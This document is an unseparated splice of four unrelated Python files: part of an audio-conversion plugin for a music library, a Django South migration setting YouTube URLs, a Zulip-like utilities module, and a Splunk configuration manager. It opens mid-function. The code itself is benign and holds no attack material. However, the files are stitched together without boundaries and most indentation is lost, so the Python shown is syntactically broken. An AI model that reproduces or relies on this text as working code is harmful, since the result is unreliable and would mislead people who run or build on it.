for i, arg in enumerate(args):
args[i] = Template(arg).safe_substitute({
b'source': source,
b'dest': dest,
})
if pretend:
self._log.info(' '.join(ui.decargs(args)))
return
try:
util.command_output(args)
except subprocess.CalledProcessError as exc:
# Something went wrong (probably Ctrl+C), remove temporary files
self._log.info(u'Encoding {0} failed. Cleaning up...',
util.displayable_path(source))
self._log.debug(u'Command {0} exited with status {1}',
exc.cmd.decode('utf8', 'ignore'),
exc.returncode)
util.remove(dest)
util.prune_dirs(os.path.dirname(dest))
raise
except OSError as exc:
raise ui.UserError(
u"convert: could invoke '{0}': {1}".format(
' '.join(args), exc
)
)
if not quiet and not pretend:
self._log.info(u'Finished encoding {0}',
util.displayable_path(source))
def convert_item(self, dest_dir, keep_new, path_formats, fmt,
pretend=False):
command, ext = get_format(fmt)
item, original, converted = None, None, None
while True:
item = yield (item, original, converted)
dest = item.destination(basedir=dest_dir,
path_formats=path_formats)
# When keeping the new file in the library, we first move the
# current (pristine) file to the destination. We'll then copy it
# back to its old path or transcode it to a new path.
if keep_new:
original = dest
converted = item.path
if should_transcode(item, fmt):
converted = replace_ext(converted, ext)
else:
original = item.path
if should_transcode(item, fmt):
dest = replace_ext(dest, ext)
converted = dest
# Ensure that only one thread tries to create directories at a
# time. (The existence check is not atomic with the directory
# creation inside this function.)
if not pretend:
with _fs_lock:
util.mkdirall(dest)
if os.path.exists(util.syspath(dest)):
self._log.info(u'Skipping {0} (target file exists)',
util.displayable_path(item.path))
continue
if keep_new:
if pretend:
self._log.info(u'mv {0} {1}',
util.displayable_path(item.path),
util.displayable_path(original))
else:
self._log.info(u'Moving to {0}',
util.displayable_path(original))
util.move(item.path, original)
if should_transcode(item, fmt):
try:
self.encode(command, original, converted, pretend)
except subprocess.CalledProcessError:
continue
else:
if pretend:
self._log.info(u'cp {0} {1}',
util.displayable_path(original),
util.displayable_path(converted))
else:
# No transcoding necessary.
self._log.info(u'Copying {0}',
util.displayable_path(item.path))
util.copy(original, converted)
if pretend:
continue
# Write tags from the database to the converted file.
item.try_write(path=converted)
if keep_new:
# If we're keeping the transcoded file, read it again (after
# writing) to get new bitrate, duration, etc.
item.path = converted
item.read()
item.store() # Store new path and audio data.
if self.config['embed']:
album = item.get_album()
if album and album.artpath:
self._log.debug(u'embedding album art from {}',
util.displayable_path(album.artpath))
art.embed_item(self._log, item, album.artpath,
itempath=converted)
if keep_new:
plugins.send('after_convert', item=item,
dest=dest, keepnew=True)
else:
plugins.send('after_convert', item=item,
dest=converted, keepnew=False)
def copy_album_art(self, album, dest_dir, path_formats, pretend=False):
"""Copies or converts the associated cover art of the album. Album must
have at least one track.
"""
if not album or not album.artpath:
return
album_item = album.items().get()
# Album shouldn't be empty.
if not album_item:
return
        # Get the destination of the first item (track) of the album; we use
        # this function to format the path according to path_formats.
dest = album_item.destination(basedir=dest_dir,
path_formats=path_formats)
# Remove item from the path.
dest = os.path.join(*util.components(dest)[:-1])
dest = album.art_destination(album.artpath, item_dir=dest)
if album.artpath == dest:
return
if not pretend:
util.mkdirall(dest)
if os.path.exists(util.syspath(dest)):
self._log.info(u'Skipping {0} (target file exists)',
util.displayable_path(album.artpath))
return
# Decide whether we need to resize the cover-art image.
resize = False
maxwidth = None
if self.config['album_art_maxwidth']:
maxwidth = self.config['album_art_maxwidth'].get(int)
size = ArtResizer.shared.get_size(album.artpath)
self._log.debug('image size: {}', size)
if size:
resize = size[0] > maxwidth
else:
self._log.warning(u'Could not get size of image (please see '
u'documentation for dependencies).')
# Either copy or resize (while copying) the image.
if resize:
self._log.info(u'Resizing cover art from {0} to {1}',
util.displayable_path(album.artpath),
util.displayable_path(dest))
if not pretend:
ArtResizer.shared.resize(maxwidth, album.artpath, dest)
else:
if pretend:
self._log.info(u'cp {0} {1}',
util.displayable_path(album.artpath),
util.displayable_path(dest))
else:
                self._log.info(u'Copying cover art to {0}',
                               util.displayable_path(dest))
util.copy(album.artpath, dest)
def convert_func(self, lib, opts, args):
if not opts.dest:
opts.dest = self.config['dest'].get()
if not opts.dest:
raise ui.UserError(u'no convert destination set')
opts.dest = util.bytestring_path(opts.dest)
if not opts.threads:
opts.threads = self.config['threads'].get(int)
if self.config['paths']:
path_formats = ui.get_path_formats(self.config['paths'])
else:
path_formats = ui.get_path_formats()
if not opts.format:
opts.format = self.config['format'].get(unicode).lower()
pretend = opts.pretend if opts.pretend is not None else \
self.config['pretend'].get(bool)
if not pretend:
ui.commands.list_items(lib, ui.decargs(args), opts.album)
if not (opts.yes or ui.input_yn(u"Convert? (Y/n)")):
return
if opts.album:
albums = lib.albums(ui.decargs(args))
items = (i for a in albums for i in a.items())
if self.config['copy_album_art']:
for album in albums:
self.copy_album_art(album, opts.dest, path_formats,
pretend)
else:
items = iter(lib.items(ui.decargs(args)))
convert = [self.convert_item(opts.dest,
opts.keep_new,
path_formats,
opts.format,
pretend)
for _ in range(opts.threads)]
pipe = util.pipeline.Pipeline([items, convert])
pipe.run_parallel()
def convert_on_import(self, lib, item):
"""Transcode a file automatically after it is imported into the
library.
"""
fmt = self.config['format'].get(unicode).lower()
if should_transcode(item, fmt):
command, ext = get_format()
# Create a temporary file for the conversion.
tmpdir = self.config['tmpdir'].get()
fd, dest = tempfile.mkstemp('.' + ext, dir=tmpdir)
os.close(fd)
dest = util.bytestring_path(dest)
_temp_files.append(dest) # Delete the transcode later.
# Convert.
try:
self.encode(command, item.path, dest)
except subprocess.CalledProcessError:
return
# Change the newly-imported database entry to point to the
# converted file.
item.path = dest
item.write()
item.read() # Load new audio information data.
item.store()
def _cleanup(self, task, session):
for path in task.old_paths:
if path in _temp_files:
if os.path.isfile(path):
util.remove(path)
_temp_files.remove(path)
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for n in orm.NetworkGroup.objects.all():
if n.youtube:
n.youtube_url = 'https://www.youtube.com/user/' + n.youtube
n.save()
def backwards(self, orm):
raise RuntimeError('This migration cannot be reversed')
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
u'organisation.board': {
'Meta': {'object_name': 'Board'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Person']", 'through': u"orm['organisation.BoardMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.boardmembership': {
'Meta': {'object_name': 'BoardMembership'},
'board': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Board']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Person']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.featuredproject': {
'Meta': {'object_name': 'FeaturedProject', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['organisation.Project']"})
},
u'organisation.featuredtheme': {
'Meta': {'object_name': 'FeaturedTheme', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'theme': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['organisation.Theme']"})
},
u'organisation.networkgroup': {
'Meta': {'ordering': "('country', 'region')", 'unique_together': "(('country', 'region'),)", 'object_name': 'NetworkGroup'},
'country': ('django_countries.fields.CountryField', [], {'max_length': '2'}),
'country_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'extra_information': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'facebook_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'group_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailinglist_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Person']", 'through': u"orm['organisation.NetworkGroupMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'position': ('geoposition.fields.GeopositionField', [], {'default': "'0,0'", 'max_length': '42', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'region_slug': ('django.db.models.fields.SlugField', [], {'default': 'None', 'max_length': '50'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '18', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'working_groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.WorkingGroup']", 'symmetrical': 'False', 'blank': 'True'}),
'youtube': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'youtube_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'organisation.networkgrouplist': {
'Meta': {'object_name': 'NetworkGroupList', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'group_type': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'organisation.networkgroupmembership': {
'Meta': {'ordering': "['-order', 'person__name']", 'object_name': 'NetworkGroupMembership'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'networkgroup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.NetworkGroup']"}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Person']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.person': {
'Meta': {'ordering': "['name']", 'object_name': 'Person'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '18', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'organisation.project': {
'Meta': {'ordering': "('name',)", 'object_name': 'Project'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailinglist_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'sourcecode_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'teaser': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'themes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Theme']", 'symmetrical': 'False', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '18', 'blank': 'True'}),
'types': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.ProjectType']", 'symmetrical': 'False', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.projectlist': {
'Meta': {'object_name': 'ProjectList', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'project_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.ProjectType']", 'null': 'True', 'blank': 'True'}),
'theme': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Theme']", 'null': 'True', 'blank': 'True'})
},
u'organisation.projecttype': {
'Meta': {'object_name': 'ProjectType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.signupform': {
'Meta': {'object_name': 'SignupForm', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Get Connected to Open Knowledge'", 'max_length': '50'})
},
u'organisation.theme': {
'Meta': {'object_name': 'Theme'},
'blurb': ('django.db.models.fields.TextField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.unit': {
'Meta': {'ordering': "['-order', 'name']", 'object_name': 'Unit'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Person']", 'through': u"orm['organisation.UnitMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.unitmembership': {
'Meta': {'ordering': "['-order', 'person__name']", 'object_name': 'UnitMembership'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Person']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Unit']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.workinggroup': {
'Meta': {'ordering': "('name',)", 'object_name': 'WorkingGroup'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'incubation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'themes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'workinggroups'", 'blank': 'True', 'to': u"orm['organisation.Theme']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['organisation']
symmetrical = True
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from typing import Any, Callable, List, Optional, Sequence, TypeVar, Iterable, Set, Tuple, Text
from six import binary_type
import base64
import errno
import hashlib
import heapq
import itertools
import os
import sys
from time import sleep
from django.conf import settings
from django.http import HttpRequest
from six.moves import range, map, zip_longest
from zerver.lib.str_utils import force_text
T = TypeVar('T')
def statsd_key(val, clean_periods=False):
# type: (Any, bool) -> str
if not isinstance(val, str):
val = str(val)
if ':' in val:
val = val.split(':')[0]
val = val.replace('-', "_")
if clean_periods:
val = val.replace('.', '_')
return val
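# Example (editor's addition), using a hypothetical host name:
#   statsd_key('staging.zulip.example.com:9991')        -> 'staging.zulip.example.com'
#   statsd_key('staging.zulip.example.com:9991', True)  -> 'staging_zulip_example_com'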
class StatsDWrapper(object):
"""Transparently either submit metrics to statsd
or do nothing without erroring out"""
    # Backported support for gauge deltas: our statsd server supports them,
    # but a pystatsd release with that support has not shipped yet.
def _our_gauge(self, stat, value, rate=1, delta=False):
# type: (str, float, float, bool) -> None
"""Set a gauge value."""
from django_statsd.clients import statsd
if delta:
value_str = '%+g|g' % (value,)
else:
value_str = '%g|g' % (value,)
statsd._send(stat, value_str, rate)
def __getattr__(self, name):
# type: (str) -> Any
# Hand off to statsd if we have it enabled
# otherwise do nothing
if name in ['timer', 'timing', 'incr', 'decr', 'gauge']:
if settings.STATSD_HOST != '':
from django_statsd.clients import statsd
if name == 'gauge':
return self._our_gauge
else:
return getattr(statsd, name)
else:
return lambda *args, **kwargs: None
        raise AttributeError(name)
statsd = StatsDWrapper()
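# Illustrative usage sketch (not part of the original module): the wrapper
# forwards the usual statsd calls when settings.STATSD_HOST is configured and
# silently no-ops otherwise, so callers can instrument unconditionally.
# The stat names below are hypothetical.
def _example_statsd_usage():
    # type: () -> None
    statsd.incr('events.example_event')                  # counter
    statsd.timing('example.request_time', 123)           # timer value in ms
    statsd.gauge('example.queue_depth', 7)               # absolute gauge
    statsd.gauge('example.queue_depth', 2, delta=True)   # gauge delta ('+2|g')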
# Runs the callback with slices of all_list of a given batch_size
def run_in_batches(all_list, batch_size, callback, sleep_time = 0, logger = None):
# type: (Sequence[T], int, Callable[[Sequence[T]], None], int, Optional[Callable[[str], None]]) -> None
if len(all_list) == 0:
return
limit = (len(all_list) // batch_size) + 1
for i in range(limit):
start = i*batch_size
end = (i+1) * batch_size
if end >= len(all_list):
end = len(all_list)
batch = all_list[start:end]
if logger:
logger("Executing %s in batch %s of %s" % (end-start, i+1, limit))
callback(batch)
if i != limit - 1:
sleep(sleep_time)
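# Illustrative usage sketch (not part of the original module), using a
# hypothetical per-batch callback: process 1000 ids in slices of 100,
# sleeping 2 seconds between batches and logging progress.
def _example_run_in_batches():
    # type: () -> None
    user_ids = list(range(1000))
    def send_welcome_emails(batch):
        # type: (Sequence[int]) -> None
        pass  # hypothetical per-batch work
    def log(msg):
        # type: (str) -> None
        sys.stdout.write(msg + "\n")
    run_in_batches(user_ids, 100, send_welcome_emails, sleep_time=2, logger=log)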
def make_safe_digest(string, hash_func=hashlib.sha1):
# type: (Text, Callable[[binary_type], Any]) -> Text
"""
return a hex digest of `string`.
"""
# hashlib.sha1, md5, etc. expect bytes, so non-ASCII strings must
# be encoded.
return force_text(hash_func(string.encode('utf-8')).hexdigest())
def log_statsd_event(name):
# type: (str) -> None
"""
Sends a single event to statsd with the desired name and the current timestamp
This can be used to provide vertical lines in generated graphs,
for example when doing a prod deploy, bankruptcy request, or
other one-off events
Note that to draw this event as a vertical line in graphite
you can use the drawAsInfinite() command
"""
event_name = "events.%s" % (name,)
statsd.incr(event_name)
def generate_random_token(length):
# type: (int) -> str
return str(base64.b16encode(os.urandom(length // 2)).decode('utf-8').lower())
def mkdir_p(path):
# type: (str) -> None
    # Python versions before 3.2 have no analog to `mkdir -p`.
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def query_chunker(queries, id_collector=None, chunk_size=1000, db_chunk_size=None):
# type: (List[Any], Set[int], int, int) -> Iterable[Any]
'''
This merges one or more Django ascending-id queries into
a generator that returns chunks of chunk_size row objects
    during each yield, preserving id order across all results.
Queries should satisfy these conditions:
- They should be Django filters.
- They should return Django objects with "id" attributes.
- They should be disjoint.
The generator also populates id_collector, which we use
internally to enforce unique ids, but which the caller
can pass in to us if they want the side effect of collecting
all ids.
'''
if db_chunk_size is None:
db_chunk_size = chunk_size // len(queries)
assert db_chunk_size >= 2
assert chunk_size >= 2
if id_collector is not None:
assert(len(id_collector) == 0)
else:
id_collector = set()
def chunkify(q, i):
# type: (Any, int) -> Iterable[Tuple[int, int, Any]]
q = q.order_by('id')
min_id = -1
while True:
assert db_chunk_size is not None # Hint for mypy, but also workaround for mypy bug #3442.
rows = list(q.filter(id__gt=min_id)[0:db_chunk_size])
if len(rows) == 0:
break
for row in rows:
yield (row.id, i, row)
min_id = rows[-1].id
iterators = [chunkify(q, i) for i, q in enumerate(queries)]
merged_query = heapq.merge(*iterators)
while True:
tup_chunk = list(itertools.islice(merged_query, 0, chunk_size))
if len(tup_chunk) == 0:
break
# Do duplicate-id management here.
tup_ids = set([tup[0] for tup in tup_chunk])
assert len(tup_ids) == len(tup_chunk)
assert len(tup_ids.intersection(id_collector)) == 0
id_collector.update(tup_ids)
yield [row for row_id, i, row in tup_chunk]
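# Illustrative usage sketch (not part of the original module), assuming two
# hypothetical, disjoint Django querysets over models with integer ids.
def _example_query_chunker(query_a, query_b):
    # type: (Any, Any) -> None
    all_ids = set()  # type: Set[int]
    for chunk in query_chunker([query_a, query_b], id_collector=all_ids,
                               chunk_size=500):
        for row in chunk:
            pass  # rows arrive in ascending id order, at most 500 per chunk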
def _extract_subdomain(request):
# type: (HttpRequest) -> Text
domain = request.get_host().lower()
index = domain.find("." + settings.EXTERNAL_HOST)
if index == -1:
return ""
return domain[0:index]
def get_subdomain(request):
# type: (HttpRequest) -> Text
subdomain = _extract_subdomain(request)
if subdomain in settings.ROOT_SUBDOMAIN_ALIASES:
return ""
return subdomain
def is_subdomain_root_or_alias(request):
# type: (HttpRequest) -> bool
subdomain = _extract_subdomain(request)
return not subdomain or subdomain in settings.ROOT_SUBDOMAIN_ALIASES
def check_subdomain(realm_subdomain, user_subdomain):
# type: (Optional[Text], Optional[Text]) -> bool
if settings.REALMS_HAVE_SUBDOMAINS and realm_subdomain is not None:
if (realm_subdomain == "" and user_subdomain is None):
return True
if realm_subdomain != user_subdomain:
return False
return True
def split_by(array, group_size, filler):
# type: (List[Any], int, Any) -> List[List[Any]]
"""
Group elements into list of size `group_size` and fill empty cells with
`filler`. Recipe from https://docs.python.org/3/library/itertools.html
"""
args = [iter(array)] * group_size
return list(map(list, zip_longest(*args, fillvalue=filler)))
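# Illustrative sketch (not part of the original module): grouping with a filler.
def _example_split_by():
    # type: () -> None
    rows = split_by([1, 2, 3, 4, 5], 2, None)
    assert rows == [[1, 2], [3, 4], [5, None]]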
def is_remote_server(identifier):
# type: (Text) -> bool
"""
This function can be used to identify the source of API auth
request. We can have two types of sources, Remote Zulip Servers
and UserProfiles.
"""
return "@" not in identifier
|
|
"""
This module handles configuration-related stuff.
"""
import os.path as op
from . import conf_endpoints as scmc
from . import data_input_endpoints as scmdi
from . import property_endpoints as scmp
from . import request as req
def conf_file2name(conf_file):
conf_name = op.basename(conf_file)
if conf_name.endswith(".conf"):
conf_name = conf_name[:-5]
return conf_name
class ConfManager(object):
def __init__(self, splunkd_uri, session_key, owner="nobody", app_name="-"):
"""
        :param app_name: when creating a conf stanza, app_name must be set to
        a real app name, not "-"
        :param owner: when creating a conf stanza, owner must be set to a real
        owner, not "-"
"""
self.splunkd_uri = splunkd_uri
self.session_key = session_key
self.owner = owner
self.app_name = app_name
def set_appname(self, appname):
"""
        There are cases where confs need to be edited/removed/created in a
        different app context. Call this interface to switch the app context
        before manipulating confs in that context.
"""
self.app_name = appname
def all_stanzas(self, conf_name, do_reload=False, ret_metadata=False):
"""
        :return: a list of stanza dicts if successful.
        Otherwise raise an exception.
"""
if do_reload:
self.reload_conf(conf_name)
stanzas = scmc.get_conf(self.splunkd_uri, self.session_key,
"-", "-", conf_name)
return self._delete_metadata(stanzas, ret_metadata)
def all_stanzas_as_dicts(self, conf_name, do_reload=False,
ret_metadata=False):
"""
        :return: a dict of stanza dicts, keyed by stanza name, if successful.
        Otherwise raise an exception.
"""
stanzas = self.all_stanzas(conf_name, do_reload, ret_metadata)
return {stanza["name"]: stanza for stanza in stanzas}
def get_stanza(self, conf_name, stanza,
do_reload=False, ret_metadata=False):
"""
        :return: a stanza dict if successful, otherwise raise an exception
"""
if do_reload:
self.reload_conf(conf_name)
stanzas = scmc.get_conf(self.splunkd_uri, self.session_key,
"-", "-", conf_name, stanza)
stanzas = self._delete_metadata(stanzas, ret_metadata)
return stanzas[0]
def reload_conf(self, conf_name):
scmc.reload_conf(self.splunkd_uri, self.session_key, "-", conf_name)
def enable_conf(self, conf_name, stanza):
scmc.operate_conf(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, "enable")
def disable_conf(self, conf_name, stanza):
scmc.operate_conf(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, "disable")
def get_property(self, conf_name, stanza, key, do_reload=False):
if do_reload:
self.reload_conf(conf_name)
return scmp.get_property(self.splunkd_uri, self.session_key,
"-", "-", conf_name, stanza, key)
def stanza_exist(self, conf_name, stanza):
return scmc.stanza_exist(self.splunkd_uri, self.session_key,
"-", "-", conf_name, stanza)
def create_stanza(self, conf_name, stanza, key_values):
scmc.create_stanza(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, key_values)
def update_stanza(self, conf_name, stanza, key_values):
scmc.update_stanza(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, key_values)
def delete_stanza(self, conf_name, stanza):
scmc.delete_stanza(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza)
def create_properties(self, conf_name, stanza):
scmp.create_properties(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza)
def update_properties(self, conf_name, stanza, key_values):
scmp.update_properties(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, key_values)
